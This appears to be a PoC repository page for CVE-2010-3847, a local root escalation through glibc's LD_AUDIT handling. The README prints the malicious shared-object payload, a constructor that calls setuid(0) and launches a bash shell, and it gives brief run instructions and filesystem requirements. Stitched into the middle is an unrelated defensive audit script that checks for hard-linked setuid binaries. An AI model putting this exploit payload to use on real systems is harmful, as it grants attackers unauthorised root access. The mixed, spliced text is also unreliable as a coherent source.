
CVE-2010-3847 PoC — GNU C Library Dynamic Linker Vulnerability

Source

Associated vulnerability

Title: GNU C Library Dynamic Linker Vulnerability (CVE-2010-3847)

Description: elf/dl-load.c in ld.so in the GNU C Library (aka glibc or libc6) through 2.11.2, and 2.12.x through 2.12.1, does not properly handle a value of $ORIGIN for the LD_AUDIT environment variable, which allows local users to gain privileges via a crafted dynamic shared object (DSO) located in an arbitrary directory.

Description

Script to take advantage of CVE-2010-3847
Readme
CVE-2010-3847 script
====================
Meant to automate the exploit discussed in
[http://marc.info/?l=full-disclosure&m=128776663124692&w=2].  Tested on
CentOS 5 x86.

The DSO it outputs is compiled from the following code:
```c
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

/* Constructor: the dynamic linker runs this when the DSO is loaded,
 * before the host program's main(). */
void __attribute__((constructor)) init(void)
{
   setuid(0);
   system("/bin/bash");
}
```

Usage
-----
Download it, put it somewhere executable, and run it.

Gotchas
-------
`/tmp` and wherever `ping` is have to be on the same filesystem.  If not,
adjust the paths accordingly.
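The "same filesystem" requirement above exists because hard links cannot cross filesystems, so a useful defensive check is to look for setuid/setgid binaries that have acquired a second hard link. This audit script is an added example, not part of the original PoC; the function names and the temporary-directory demonstration are mine, and it assumes a `find` that supports `-xdev`, `-perm` and `-links`.

```shell
#!/bin/sh
# Defensive audit for the precondition behind the README's "same filesystem"
# gotcha: a setuid or setgid binary hard-linked into a second location.
# Assumes find(1) with -xdev, -perm and -links (GNU and BSD both qualify).

# Print every setuid/setgid regular file under $1 (default /) whose link
# count is greater than one. Unreadable directories are silently skipped.
audit_setuid_links() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -links +1 -print 2>/dev/null
}

# Number of findings; the value a cron job or test would act on.
count_setuid_links() {
    audit_setuid_links "$1" | wc -l | tr -d ' '
}

# Kernel-side mitigation state (Linux 3.6+ exposes fs.protected_hardlinks).
# Prints 1 when enabled, 0 when disabled, "unknown" on other systems.
hardlink_protection() {
    if [ -r /proc/sys/fs/protected_hardlinks ]; then
        cat /proc/sys/fs/protected_hardlinks
    else
        echo unknown
    fi
}

# Constructed demonstration: a setuid file we own, hard-linked once, in a
# scratch directory. Both names share the inode, so both are reported.
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/bin" && chmod 4755 "$d/bin" && ln "$d/bin" "$d/bin-link" || return 1
    echo "findings under $d:"
    audit_setuid_links "$d"
    echo "count=$(count_setuid_links "$d")"
    echo "fs.protected_hardlinks=$(hardlink_protection)"
    rm -rf "$d"
}

demo || echo "demo skipped (could not create scratch files)"
```

Run it as root against `/` for a real audit; a clean host normally reports no multiply-linked setuid files at all.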
File Snapshot

[4.0K] /data/pocs/6d1bc6840dcfa35f71366549bee1028f67aa34c5
├── [ 23K] CVE-2010-3847.sh
├── [ 858] LICENSE
└── [ 571] README.md

0 directories, 3 files